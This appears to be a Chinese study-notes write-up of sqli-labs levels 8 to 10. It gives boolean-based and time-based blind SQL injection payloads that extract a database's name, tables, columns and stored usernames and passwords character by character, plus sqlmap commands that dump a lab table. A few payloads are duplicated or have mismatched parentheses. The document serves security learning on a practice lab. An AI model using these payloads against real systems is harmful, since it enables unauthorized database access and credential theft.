5.8.第八关 get布尔盲注
5.8.1.手动注入
(1)判断注入类型
?id=1' and 1=1--+ 回显You are in...........
?id=1' and 1=2--+ 空
字符型注入
(2)判断字段数
?id=1' order by 3--+ 回显You are in...........
?id=1' order by 4--+ 空
字段数为3
(3)猜解数据库名长度
没有回显,使用布尔盲注
?id=1' and length(database())>1--+ 回显You are in...........
?id=1' and length(database())>10--+ 空
?id=1' and length(database())>5--+ 回显You are in...........
?id=1' and length(database())=8--+ 回显You are in...........
length()函数,返回字符串长度
数据库名长度为8
(4)利用ascii猜解数据库名
substr(string, start, length) 字符串截取函数
string是要处理的字符串
start是开始位置(从1开始计数)
length是要截取的长度
ascii() 返回字符ascii码
大写字母范围:65 (A) ~ 90 (Z)→ 连续递增,无间隔
小写字母范围:97 (a) ~ 122 (z)→ 连续递增,无间隔,大小写差值:32
26个小写字母ascii值
a97 h104 o111 v118
b98 i105 p112 w119
c99 j106 q113 x120
d100 k107 r114 y121
e101 l108 s115 z122
f102 m109 t116
g103 n110 u117 大写-32
?id=1' and (ascii(substr(database(),1,1)))>100--+ 正常回显
?id=1' and (ascii(substr(database(),1,1)))>200--+ 空
?id=1' and (ascii(substr(database(),1,1)))>150--+ 空
?id=1' and (ascii(substr(database(),1,1)))>125--+ 空
?id=1' and (ascii(substr(database(),1,1)))>112--+ 正常回显
?id=1' and (ascii(substr(database(),1,1)))>120--+ 空
?id=1' and (ascii(substr(database(),1,1)))>116--+ 空
?id=1' and (ascii(substr(database(),1,1)))=115--+ 正常回显,数据库名第1个字母为s
?id=1' and (ascii(substr(database(),2,1)))>100--+ 正常回显
?id=1' and (ascii(substr(database(),2,1)))>200--+ 空
?id=1' and (ascii(substr(database(),2,1)))=101--+ 正常回显,数据库名第2个字母为e
?id=1' and (ascii(substr(database(),3,1)))=99--+ 正常回显,数据库名第3个字母为c
?id=1' and (ascii(substr(database(),4,1)))=117--+ 正常回显,数据库名第4个字母为u
?id=1' and (ascii(substr(database(),5,1)))=114--+ 正常回显,数据库名第5个字母为r
?id=1' and (ascii(substr(database(),6,1)))=105--+ 正常回显,数据库名第6个字母为i
?id=1' and (ascii(substr(database(),7,1)))=116--+ 正常回显,数据库名第7个字母为t
?id=1' and (ascii(substr(database(),8,1)))=121--+ 正常回显,数据库名第8个字母为y
?id=1' and (ascii(substr(database(),9,1)))>96--+ 空
数据库名为security
无语,能做出来,但好慢好麻烦啊
(5)利用ascii猜解表名
第1个表的表名第1个字母
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))>110--+
将database()替换为select table_name from information_schema.tables where table_schema='security' limit 0,1
里面是数字,如limit x,1这个x,是控制第x+1个表,外面的数字,如substr(A,y,1)这个y,是控制第x+1个表里的第y个字母
里面的表x从0开始,外面的表y从1开始
第4个表的表名第1个字母
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))>110--+ 正常回显
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))>115--+ 正常回显
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))>118--+ 空
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))=117--+ 正常回显,u
第4个表的表名第2个字母
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),2,1)))=115--+ 正常回显,s
第4个表的表名第3个字母
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),3,1)))=101--+ 正常回显,e
第4个表的表名第4个字母
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),4,1)))=114--+ 正常回显,r
第4个表的表名第5个字母
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),5,1)))=115--+ 正常回显,s
第4个表的表名users
这个方法了解一下即可,太麻烦了,实战中怎么用,无敌费时
(6)利用ascii猜解字段名
users表的第1个字段的第1个字母
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)))>110--+ 空
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)))>100--+ 正常回显
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)))=105--+ 正常回显,i
users表的第1个字段的第2个字母
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),2,1)))=100--+ 正常回显,d
users表的第1个字段为id
user表的第2个字段的第1个字母
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1)))=117--+ 正常回显,u
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),2,1)))=115--+ 正常回显,s
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),3,1)))=101--+ 正常回显,e
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),4,1)))=114--+ 正常回显,r
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),5,1)))=115--+ 正常回显,s
users表的第2个字段为username
同理得出user表的第3个字段为password
(7)利用ascii猜解账号密码
a97 h104 o111 v118
b98 i105 p112 w119
c99 j106 q113 x120
d100 k107 r114 y121
e101 l108 s115 z122
f102 m109 t116
g103 n110 u117 大写-32
username表第1个字段
?id=1' and (ascii(substr((select username from users limit 0,1),1,1)))=68--+ 正常回显,D
?id=1' and (ascii(substr((select username from users limit 0,1),2,1)))=117--+ 正常回显,u
?id=1' and (ascii(substr((select username from users limit 0,1),3,1)))=109--+ 正常回显,m
?id=1' and (ascii(substr((select username from users limit 0,1),4,1)))=98--+ 正常回显,b
username表第6个字段
?id=1' and (ascii(substr((select username from users limit 7,1),1,1)))=97--+ 正常回显,a
?id=1' and (ascii(substr((select username from users limit 7,1),2,1)))=100--+ 正常回显,d
?id=1' and (ascii(substr((select username from users limit 7,1),3,1)))=109--+ 正常回显,m
?id=1' and (ascii(substr((select username from users limit 7,1),4,1)))=105--+ 正常回显,i
?id=1' and (ascii(substr((select username from users limit 7,1),5,1)))=110--+ 正常回显,n
password表第1个字段
?id=1' and (ascii(substr((select username from users limit 7,1),5,1)))=110--+ 正常回显,n
?id=1' and (ascii(substr((select password from users limit 0,1),1,1)))=68--+ 正常回显,D
?id=1' and (ascii(substr((select password from users limit 0,1),2,1)))=117--+ 正常回显,u
?id=1' and (ascii(substr((select password from users limit 0,1),3,1)))=109--+ 正常回显,m
?id=1' and (ascii(substr((select password from users limit 0,1),4,1)))=98--+ 正常回显,b
password表第6个字段
?id=1' and (ascii(substr((select password from users limit 7,1),1,1)))=97--+ 正常回显,a
?id=1' and (ascii(substr((select password from users limit 7,1),2,1)))=100--+ 正常回显,d
?id=1' and (ascii(substr((select password from users limit 7,1),3,1)))=109--+ 正常回显,m
?id=1' and (ascii(substr((select password from users limit 7,1),4,1)))=105--+ 正常回显,i
?id=1' and (ascii(substr((select password from users limit 7,1),5,1)))=110--+ 正常回显,n
5.8.2.sqlmap自动注入
同前七关
5.9.第九关 get时间盲注
5.9.1.手动注入
(1)判断注入类型和字段数
?id=1 and if(1=1,sleep(5),1)--+ 时间正常
?id=1' and if(1=1,sleep(5),1)--+ 时间延迟5s
字符型注入,字段数3
(2)猜解数据库名长度
?id=1' and if(length(database())>5,sleep(5),1)--+ 时间延迟5s
?id=1' and if(length(database())>10,sleep(5),1)--+ 时间正常
?id=1' and if(length(database())=8,sleep(5),1)--+ 时间延迟5s
数据库名长度为8
(3)利用ascii猜解数据库名
a97 h104 o111 v118
b98 i105 p112 w119
c99 j106 q113 x120
d100 k107 r114 y121
e101 l108 s115 z122
f102 m109 t116
g103 n110 u117 大写-32
数据库名第1个字母
?id=1' and if(ascii(substr((database(),1,1))>110,sleep(5),1)--+ 时间延迟5s
?id=1' and if(ascii(substr((database(),1,1))>115,sleep(5),1)--+ 时间正常
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ 时间延迟5s,s
数据库名第2个字母
?id=1' and if(ascii(substr(database(),2,1))=101,sleep(5),1)--+ 时间延迟5s,e
数据库名第3个字母
?id=1' and if(ascii(substr(database(),3,1))=99,sleep(5),1)--+ 时间延迟5s,c
...
数据库名称security
(4)利用ascii猜解表名
a97 h104 o111 v118
b98 i105 p112 w119
c99 j106 q113 x120
d100 k107 r114 y121
e101 l108 s115 z122
f102 m109 t116
g103 n110 u117 大写-32
security数据库第4个表第1个字母
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(5),1)--+ 时间延迟5s,u
第2个字母 limit 3,1),2,1))
第3个字母 limit 3,1),3,1))
第4个字母 limit 3,1),4,1))
第2个表第3个字母 limit 1,1),3,1))
...
security数据库第4个表为users
(5)利用ascii猜解字段名
a97 h104 o111 v118
b98 i105 p112 w119
c99 j106 q113 x120
d100 k107 r114 y121
e101 l108 s115 z122
f102 m109 t116
g103 n110 u117 大写-32
security数据库users表第2个字段第1个字母
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1))=117,sleep(5),1)--+ 时间延迟5s,u
username
security数据库users表第3个字段第1个字母
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),1,1))=112,sleep(5),1)--+ 时间延迟5s,p
password
(6)利用ascii猜解账号密码
security数据库users表username字段的第8个数据第1个字母-第5个字母
?id=1' and if(ascii(substr((select username from users limit 7,1),1,1))=97,sleep(5),1)--+ 时间延迟5s,a
?id=1' and if(ascii(substr((select username from users limit 7,1),2,1))=100,sleep(5),1)--+ 时间延迟5s,d
?id=1' and if(ascii(substr((select username from users limit 7,1),3,1))=109,sleep(5),1)--+ 时间延迟5s,m
?id=1' and if(ascii(substr((select username from users limit 7,1),4,1))=105,sleep(5),1)--+ 时间延迟5s,i
?id=1' and if(ascii(substr((select username from users limit 7,1),5,1))=110,sleep(5),1)--+ 时间延迟5s,n
admin
security数据库users表password字段的第8个数据第1个字母-第5个字母
admin
5.9.2sqlmap自动注入
同前八关
5.10.第十关 get时间盲注
5.10.1.手动注入
除了字符型注入闭合方式改为",其他不变
5.10.2.sqlmap自动注入
比前九关多加 -p id --level 3 --risk 3
sqlmap -u "http://192.168.1.64/sqli-labs/Less-10/?id=1" --dbms mysql -v 1 -p id --batch --level 3 --risk 3 --dbs
sqlmap -u "http://192.168.1.64/sqli-labs/Less-10/?id=1" --dbms mysql -v 1 -p id --batch --level 3 --risk 3 -D security --tables
sqlmap -u "http://192.168.1.64/sqli-labs/Less-10/?id=1" --dbms mysql -v 1 -p id --batch --level 3 --risk 3 -D security -T users --columns
sqlmap -u "http://192.168.1.64/sqli-labs/Less-10/?id=1" --dbms mysql -v 1 -p id --batch --level 3 --risk 3 -D security -T users --dump
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
